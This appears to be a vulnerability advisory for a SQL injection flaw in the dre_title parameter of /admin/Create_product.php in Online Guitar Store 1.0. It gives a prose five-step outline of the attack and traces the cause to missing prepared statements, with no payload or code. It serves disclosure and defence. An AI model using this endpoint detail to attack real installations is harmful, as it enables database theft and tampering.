A vulnerability was found in code-projects Online Guitar Store 1.0. Affected is an unknown function of the file /admin/Create_product.php. Performing manipulation of the argument dre_title results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used.
Online Guitar Store 1.0 is vulnerable to a critical SQL injection flaw, allowing attackers to remotely compromise the database. This vulnerability, located in /admin/Create_product.php, enables unauthorized access to sensitive data and potential system takeover. The exploit is publicly available, posing a significant risk of widespread exploitation.
Step 1: Payload Delivery: An attacker crafts a malicious SQL injection payload designed to be inserted into the dre_title parameter of the /admin/Create_product.php file.
Step 2: Request Submission: The attacker submits a specially crafted HTTP POST request to the vulnerable endpoint, including the malicious payload in the dre_title parameter.
Step 3: Query Execution: The server-side PHP script processes the request and, due to the lack of input validation, directly incorporates the attacker's payload into an SQL query.
Step 4: Database Manipulation: The database server executes the modified SQL query, which now includes the attacker's malicious code. This could lead to data retrieval, modification, or deletion, depending on the payload.
Step 5: Information Disclosure/System Compromise: The attacker leverages the results of the malicious SQL query to gain unauthorized access to sensitive information (e.g., usernames, passwords, product details) or to further compromise the system (e.g., by creating a backdoor user or escalating privileges).
The vulnerability stems from insufficient input validation and sanitization of the dre_title parameter within the /admin/Create_product.php file. The application directly incorporates user-supplied data from the dre_title parameter into an SQL query without proper escaping or filtering. This allows an attacker to inject malicious SQL code, altering the intended query and potentially retrieving, modifying, or deleting data from the database. The root cause is a lack of parameterized queries or prepared statements, which would mitigate the risk of SQL injection. The specific flaw likely resides in the function responsible for processing the product creation form data and constructing the SQL query to insert the new product information into the database. The absence of input validation allows attackers to craft malicious payloads that manipulate the database query.